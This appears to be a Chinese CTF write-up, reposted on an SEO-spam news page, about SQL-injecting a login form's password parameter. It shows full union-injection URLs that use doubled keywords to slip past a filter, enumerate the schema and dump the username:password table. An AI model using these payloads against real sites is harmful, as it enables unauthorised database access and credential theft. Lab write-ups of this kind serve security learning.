当前位置: 首页 > news >正文

最好用的企业网站cms站长工具查询域名信息

最好用的企业网站cms,站长工具查询域名信息,开发一个跑腿app需要多少钱,做微商什么是官方网站信息搜集 进入界面: 输入用户名为admin,密码随便输一个: 发现是GET传参,有username和password两个传参点。 我们测试一下password点位能不能注入: 单引号闭合报错,根据报错信息,我们可以判断…

信息搜集

进入界面:
在这里插入图片描述
输入用户名为admin,密码随便输一个:
在这里插入图片描述发现是GET传参,有username和password两个传参点。
我们测试一下password点位能不能注入:
在这里插入图片描述
单引号闭合报错,根据报错信息,我们可以判断是单引号闭合。

SQL注入

先order by测试一下字段数:

check.php?username=admin&password=1' order by 3--+

在这里插入图片描述
报错。看报错信息,吞掉了order的or 和by,即过滤了or和by。
使用双写绕过:

check.php?username=admin&password=1' oorrder bbyy 3--+

测试出字段数为3.

顺便用万能密码试试能不能登录:
在这里插入图片描述
接下来按联合注入的流程走:
在这里插入图片描述union 和 select 被过滤。双写绕过:

check.php?username=admin&password=1' uniunionon selselectect 1,2,3--+

在这里插入图片描述找到相应回显位,这里我们利用回显位3:

check.php?username=admin&password=1' uniunionon selselectect 1,2,database()--+ 数据库名为geekcheck.php?username=admin&password=1' uniunionon selselectect 1,2,(selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema='geek')--+ 数据表b4bsql,geekusercheck.php?username=admin&password=1' uniunionon selselectect 1,2,(selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whewherere table_name='b4bsql')--+ 列名id,username,password(selselectect group_concat(username,":",passwoorrd) frfromom b4bsql)--+

在这里插入图片描述
得到flag.

总结

考察的是联合注入,但是增加了过滤。
使用双写绕过。

http://www.shuangfujiaoyu.com/news/44947.html

相关文章:

  • 内网穿透做网站上海今天发生的重大新闻
  • 做一个门户网站要多少钱永久免费客服系统
  • 微信订阅号不认证可以做网站吗优就业seo课程学多久
  • 建设银行佛山分行网站世界比分榜
  • 香港公司怎么做网站深圳网络推广系统
  • 龙岗 网站建设哪全网营销软件
  • 临沧高端网站建设好用的百度网盘搜索引擎
  • 深圳信用网官网北京seo公司wyhseo
  • 山东地产网站建设我想开个网站平台怎么开呢
  • 小型企业网站开发价格网络运营和网络营销的区别
  • google网站管理员中心手机如何制作网站教程
  • php可以做视频网站吗百度推广客服电话
  • 山西专业网站建设大全宁波seo优化
  • 兰州做家教去哪个网站比较好广告软文范例大全100
  • 个人主页页面seo流量优化
  • 济南自助建站软件关键字排名查询工具
  • 沧州高速公路建设管理局网站网络舆情信息
  • 代做毕设网站百度关键词竞价
  • 设计公司口号sem优化软件哪家好
  • 网站开发职业定位某网站seo策划方案
  • 一键生成logo免费网站论坛外链代发
  • 做网红用哪个网站永久免费个人网站注册
  • 网站开发教学视频营销策划方案怎么写
  • pycharm做网站今日头条新闻大事
  • 购物网站的经营要素吴江seo网站优化软件
  • 天津市做网站网络营销的案例有哪些
  • wordpress 多条件搜索做整站优化
  • 网站建设如何把更改内容网易游戏推广代理加盟
  • 游戏网站做代理wordpress seo教程
  • 如何查找网站的死链接外链是什么意思